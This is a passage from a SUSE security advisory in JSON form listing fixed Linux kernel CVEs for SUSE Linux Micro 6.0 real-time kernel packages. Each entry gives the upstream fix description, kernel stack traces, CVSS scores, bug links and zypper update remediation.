"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53860"
},
{
"cve": "CVE-2023-53861",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53861"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: correct grp validation in ext4_mb_good_group\n\nGroup corruption check will access memory of grp and will trigger kernel\ncrash if grp is NULL. So do NULL check before corruption check.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53861",
"url": "https://www.suse.com/security/cve/CVE-2023-53861"
},
{
"category": "external",
"summary": "SUSE Bug 1254678 for CVE-2023-53861",
"url": "https://bugzilla.suse.com/1254678"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53861"
},
{
"cve": "CVE-2023-53863",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53863"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetlink: do not hard code device address lenth in fdb dumps\n\nsyzbot reports that some netdev devices do not have a six bytes\naddress [1]\n\nReplace ETH_ALEN by dev-\u003eaddr_len.\n\n[1] (Case of a device where dev-\u003eaddr_len = 4)\n\nBUG: KMSAN: kernel-infoleak in instrument_copy_to_user include/linux/instrumented.h:114 [inline]\nBUG: KMSAN: kernel-infoleak in copyout+0xb8/0x100 lib/iov_iter.c:169\ninstrument_copy_to_user include/linux/instrumented.h:114 [inline]\ncopyout+0xb8/0x100 lib/iov_iter.c:169\n_copy_to_iter+0x6d8/0x1d00 lib/iov_iter.c:536\ncopy_to_iter include/linux/uio.h:206 [inline]\nsimple_copy_to_iter+0x68/0xa0 net/core/datagram.c:513\n__skb_datagram_iter+0x123/0xdc0 net/core/datagram.c:419\nskb_copy_datagram_iter+0x5c/0x200 net/core/datagram.c:527\nskb_copy_datagram_msg include/linux/skbuff.h:3960 [inline]\nnetlink_recvmsg+0x4ae/0x15a0 net/netlink/af_netlink.c:1970\nsock_recvmsg_nosec net/socket.c:1019 [inline]\nsock_recvmsg net/socket.c:1040 [inline]\n____sys_recvmsg+0x283/0x7f0 net/socket.c:2722\n___sys_recvmsg+0x223/0x840 net/socket.c:2764\ndo_recvmmsg+0x4f9/0xfd0 net/socket.c:2858\n__sys_recvmmsg net/socket.c:2937 [inline]\n__do_sys_recvmmsg net/socket.c:2960 [inline]\n__se_sys_recvmmsg net/socket.c:2953 [inline]\n__x64_sys_recvmmsg+0x397/0x490 net/socket.c:2953\ndo_syscall_x64 arch/x86/entry/common.c:50 [inline]\ndo_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80\nentry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nUninit was stored to memory at:\n__nla_put lib/nlattr.c:1009 [inline]\nnla_put+0x1c6/0x230 lib/nlattr.c:1067\nnlmsg_populate_fdb_fill+0x2b8/0x600 net/core/rtnetlink.c:4071\nnlmsg_populate_fdb net/core/rtnetlink.c:4418 [inline]\nndo_dflt_fdb_dump+0x616/0x840 net/core/rtnetlink.c:4456\nrtnl_fdb_dump+0x14ff/0x1fc0 net/core/rtnetlink.c:4629\nnetlink_dump+0x9d1/0x1310 net/netlink/af_netlink.c:2268\nnetlink_recvmsg+0xc5c/0x15a0 net/netlink/af_netlink.c:1995\nsock_recvmsg_nosec+0x7a/0x120 net/socket.c:1019\n____sys_recvmsg+0x664/0x7f0 net/socket.c:2720\n___sys_recvmsg+0x223/0x840 net/socket.c:2764\ndo_recvmmsg+0x4f9/0xfd0 net/socket.c:2858\n__sys_recvmmsg net/socket.c:2937 [inline]\n__do_sys_recvmmsg net/socket.c:2960 [inline]\n__se_sys_recvmmsg net/socket.c:2953 [inline]\n__x64_sys_recvmmsg+0x397/0x490 net/socket.c:2953\ndo_syscall_x64 arch/x86/entry/common.c:50 [inline]\ndo_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80\nentry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nUninit was created at:\nslab_post_alloc_hook+0x12d/0xb60 mm/slab.h:716\nslab_alloc_node mm/slub.c:3451 [inline]\n__kmem_cache_alloc_node+0x4ff/0x8b0 mm/slub.c:3490\nkmalloc_trace+0x51/0x200 mm/slab_common.c:1057\nkmalloc include/linux/slab.h:559 [inline]\n__hw_addr_create net/core/dev_addr_lists.c:60 [inline]\n__hw_addr_add_ex+0x2e5/0x9e0 net/core/dev_addr_lists.c:118\n__dev_mc_add net/core/dev_addr_lists.c:867 [inline]\ndev_mc_add+0x9a/0x130 net/core/dev_addr_lists.c:885\nigmp6_group_added+0x267/0xbc0 net/ipv6/mcast.c:680\nipv6_mc_up+0x296/0x3b0 net/ipv6/mcast.c:2754\nipv6_mc_remap+0x1e/0x30 net/ipv6/mcast.c:2708\naddrconf_type_change net/ipv6/addrconf.c:3731 [inline]\naddrconf_notify+0x4d3/0x1d90 net/ipv6/addrconf.c:3699\nnotifier_call_chain kernel/notifier.c:93 [inline]\nraw_notifier_call_chain+0xe4/0x430 kernel/notifier.c:461\ncall_netdevice_notifiers_info net/core/dev.c:1935 [inline]\ncall_netdevice_notifiers_extack net/core/dev.c:1973 [inline]\ncall_netdevice_notifiers+0x1ee/0x2d0 net/core/dev.c:1987\nbond_enslave+0xccd/0x53f0 drivers/net/bonding/bond_main.c:1906\ndo_set_master net/core/rtnetlink.c:2626 [inline]\nrtnl_newlink_create net/core/rtnetlink.c:3460 [inline]\n__rtnl_newlink net/core/rtnetlink.c:3660 [inline]\nrtnl_newlink+0x378c/0x40e0 net/core/rtnetlink.c:3673\nrtnetlink_rcv_msg+0x16a6/0x1840 net/core/rtnetlink.c:6395\nnetlink_rcv_skb+0x371/0x650 net/netlink/af_netlink.c:2546\nrtnetlink_rcv+0x34/0x40 net/core/rtnetlink.c:6413\nnetlink_unicast_kernel net/netlink/af_netlink.c:1339 [inline]\nnetlink_unicast+0xf28/0x1230 net/netlink/af_\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53863",
"url": "https://www.suse.com/security/cve/CVE-2023-53863"
},
{
"category": "external",
"summary": "SUSE Bug 1254657 for CVE-2023-53863",
"url": "https://bugzilla.suse.com/1254657"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53863"
},
{
"cve": "CVE-2023-53864",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53864"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/mxsfb: Disable overlay plane in mxsfb_plane_overlay_atomic_disable()\n\nWhen disabling overlay plane in mxsfb_plane_overlay_atomic_update(),\noverlay plane\u0027s framebuffer pointer is NULL. So, dereferencing it would\ncause a kernel Oops(NULL pointer dereferencing). Fix the issue by\ndisabling overlay plane in mxsfb_plane_overlay_atomic_disable() instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53864",
"url": "https://www.suse.com/security/cve/CVE-2023-53864"
},
{
"category": "external",
"summary": "SUSE Bug 1254754 for CVE-2023-53864",
"url": "https://bugzilla.suse.com/1254754"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53864"
},
{
"cve": "CVE-2023-53865",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53865"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix warning when putting transaction with qgroups enabled after abort\n\nIf we have a transaction abort with qgroups enabled we get a warning\ntriggered when doing the final put on the transaction, like this:\n\n [552.6789] ------------[ cut here ]------------\n [552.6815] WARNING: CPU: 4 PID: 81745 at fs/btrfs/transaction.c:144 btrfs_put_transaction+0x123/0x130 [btrfs]\n [552.6817] Modules linked in: btrfs blake2b_generic xor (...)\n [552.6819] CPU: 4 PID: 81745 Comm: btrfs-transacti Tainted: G W 6.4.0-rc6-btrfs-next-134+ #1\n [552.6819] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014\n [552.6819] RIP: 0010:btrfs_put_transaction+0x123/0x130 [btrfs]\n [552.6821] Code: bd a0 01 00 (...)\n [552.6821] RSP: 0018:ffffa168c0527e28 EFLAGS: 00010286\n [552.6821] RAX: ffff936042caed00 RBX: ffff93604a3eb448 RCX: 0000000000000000\n [552.6821] RDX: ffff93606421b028 RSI: ffffffff92ff0878 RDI: ffff93606421b010\n [552.6821] RBP: ffff93606421b000 R08: 0000000000000000 R09: ffffa168c0d07c20\n [552.6821] R10: 0000000000000000 R11: ffff93608dc52950 R12: ffffa168c0527e70\n [552.6821] R13: ffff93606421b000 R14: ffff93604a3eb420 R15: ffff93606421b028\n [552.6821] FS: 0000000000000000(0000) GS:ffff93675fb00000(0000) knlGS:0000000000000000\n [552.6821] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n [552.6821] CR2: 0000558ad262b000 CR3: 000000014feda005 CR4: 0000000000370ee0\n [552.6822] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n [552.6822] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n [552.6822] Call Trace:\n [552.6822] \u003cTASK\u003e\n [552.6822] ? __warn+0x80/0x130\n [552.6822] ? btrfs_put_transaction+0x123/0x130 [btrfs]\n [552.6824] ? report_bug+0x1f4/0x200\n [552.6824] ? handle_bug+0x42/0x70\n [552.6824] ? exc_invalid_op+0x14/0x70\n [552.6824] ? asm_exc_invalid_op+0x16/0x20\n [552.6824] ? btrfs_put_transaction+0x123/0x130 [btrfs]\n [552.6826] btrfs_cleanup_transaction+0xe7/0x5e0 [btrfs]\n [552.6828] ? _raw_spin_unlock_irqrestore+0x23/0x40\n [552.6828] ? try_to_wake_up+0x94/0x5e0\n [552.6828] ? __pfx_process_timeout+0x10/0x10\n [552.6828] transaction_kthread+0x103/0x1d0 [btrfs]\n [552.6830] ? __pfx_transaction_kthread+0x10/0x10 [btrfs]\n [552.6832] kthread+0xee/0x120\n [552.6832] ? __pfx_kthread+0x10/0x10\n [552.6832] ret_from_fork+0x29/0x50\n [552.6832] \u003c/TASK\u003e\n [552.6832] ---[ end trace 0000000000000000 ]---\n\nThis corresponds to this line of code:\n\n void btrfs_put_transaction(struct btrfs_transaction *transaction)\n {\n (...)\n WARN_ON(!RB_EMPTY_ROOT(\n \u0026transaction-\u003edelayed_refs.dirty_extent_root));\n (...)\n }\n\nThe warning happens because btrfs_qgroup_destroy_extent_records(), called\nin the transaction abort path, we free all entries from the rbtree\n\"dirty_extent_root\" with rbtree_postorder_for_each_entry_safe(), but we\ndon\u0027t actually empty the rbtree - it\u0027s still pointing to nodes that were\nfreed.\n\nSo set the rbtree\u0027s root node to NULL to avoid this warning (assign\nRB_ROOT).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53865",
"url": "https://www.suse.com/security/cve/CVE-2023-53865"
},
{
"category": "external",
"summary": "SUSE Bug 1254762 for CVE-2023-53865",
"url": "https://bugzilla.suse.com/1254762"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53865"
},
{
"cve": "CVE-2023-53989",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53989"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narm64: mm: fix VA-range sanity check\n\nBoth create_mapping_noalloc() and update_mapping_prot() sanity-check\ntheir \u0027virt\u0027 parameter, but the check itself doesn\u0027t make much sense.\nThe condition used today appears to be a historical accident.\n\nThe sanity-check condition:\n\n\tif ((virt \u003e= PAGE_END) \u0026\u0026 (virt \u003c VMALLOC_START)) {\n\t\t[ ... warning here ... ]\n\t\treturn;\n\t}\n\n... can only be true for the KASAN shadow region or the module region,\nand there\u0027s no reason to exclude these specifically for creating and\nupdateing mappings.\n\nWhen arm64 support was first upstreamed in commit:\n\n c1cc1552616d0f35 (\"arm64: MMU initialisation\")\n\n... the condition was:\n\n\tif (virt \u003c VMALLOC_START) {\n\t\t[ ... warning here ... ]\n\t\treturn;\n\t}\n\nAt the time, VMALLOC_START was the lowest kernel address, and this was\nchecking whether \u0027virt\u0027 would be translated via TTBR1.\n\nSubsequently in commit:\n\n 14c127c957c1c607 (\"arm64: mm: Flip kernel VA space\")\n\n... the condition was changed to:\n\n\tif ((virt \u003e= VA_START) \u0026\u0026 (virt \u003c VMALLOC_START)) {\n\t\t[ ... warning here ... ]\n\t\treturn;\n\t}\n\nThis appear to have been a thinko. The commit moved the linear map to\nthe bottom of the kernel address space, with VMALLOC_START being at the\nhalfway point. The old condition would warn for changes to the linear\nmap below this, and at the time VA_START was the end of the linear map.\n\nSubsequently we cleaned up the naming of VA_START in commit:\n\n 77ad4ce69321abbe (\"arm64: memory: rename VA_START to PAGE_END\")\n\n... keeping the erroneous condition as:\n\n\tif ((virt \u003e= PAGE_END) \u0026\u0026 (virt \u003c VMALLOC_START)) {\n\t\t[ ... warning here ... ]\n\t\treturn;\n\t}\n\nCorrect the condition to check against the start of the TTBR1 address\nspace, which is currently PAGE_OFFSET. This simplifies the logic, and\nmore clearly matches the \"outside kernel range\" message in the warning.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53989",
"url": "https://www.suse.com/security/cve/CVE-2023-53989"
},
{
"category": "external",
"summary": "SUSE Bug 1256302 for CVE-2023-53989",
"url": "https://bugzilla.suse.com/1256302"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53989"
},
{
"cve": "CVE-2023-53992",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53992"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: cfg80211: ocb: don\u0027t leave if not joined\n\nIf there\u0027s no OCB state, don\u0027t ask the driver/mac80211 to\nleave, since that\u0027s just confusing. Since set/clear the\nchandef state, that\u0027s a simple check.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53992",
"url": "https://www.suse.com/security/cve/CVE-2023-53992"
},
{
"category": "external",
"summary": "SUSE Bug 1256058 for CVE-2023-53992",
"url": "https://bugzilla.suse.com/1256058"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53992"
},
{
"cve": "CVE-2023-53994",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53994"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nionic: remove WARN_ON to prevent panic_on_warn\n\nRemove unnecessary early code development check and the WARN_ON\nthat it uses. The irq alloc and free paths have long been\ncleaned up and this check shouldn\u0027t have stuck around so long.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53994",
"url": "https://www.suse.com/security/cve/CVE-2023-53994"
},
{
"category": "external",
"summary": "SUSE Bug 1255570 for CVE-2023-53994",
"url": "https://bugzilla.suse.com/1255570"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53994"
},
{
"cve": "CVE-2023-53995",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53995"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ipv4: fix one memleak in __inet_del_ifa()\n\nI got the below warning when do fuzzing test:\nunregister_netdevice: waiting for bond0 to become free. Usage count = 2\n\nIt can be repoduced via:\n\nip link add bond0 type bond\nsysctl -w net.ipv4.conf.bond0.promote_secondaries=1\nip addr add 4.117.174.103/0 scope 0x40 dev bond0\nip addr add 192.168.100.111/255.255.255.254 scope 0 dev bond0\nip addr add 0.0.0.4/0 scope 0x40 secondary dev bond0\nip addr del 4.117.174.103/0 scope 0x40 dev bond0\nip link delete bond0 type bond\n\nIn this reproduction test case, an incorrect \u0027last_prim\u0027 is found in\n__inet_del_ifa(), as a result, the secondary address(0.0.0.4/0 scope 0x40)\nis lost. The memory of the secondary address is leaked and the reference of\nin_device and net_device is leaked.\n\nFix this problem:\nLook for \u0027last_prim\u0027 starting at location of the deleted IP and inserting\nthe promoted IP into the location of \u0027last_prim\u0027.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53995",
"url": "https://www.suse.com/security/cve/CVE-2023-53995"
},
{
"category": "external",
"summary": "SUSE Bug 1255616 for CVE-2023-53995",
"url": "https://bugzilla.suse.com/1255616"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53995"
},
{
"cve": "CVE-2023-53996",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53996"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/sev: Make enc_dec_hypercall() accept a size instead of npages\n\nenc_dec_hypercall() accepted a page count instead of a size, which\nforced its callers to round up. As a result, non-page aligned\nvaddrs caused pages to be spuriously marked as decrypted via the\nencryption status hypercall, which in turn caused consistent\ncorruption of pages during live migration. Live migration requires\naccurate encryption status information to avoid migrating pages\nfrom the wrong perspective.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
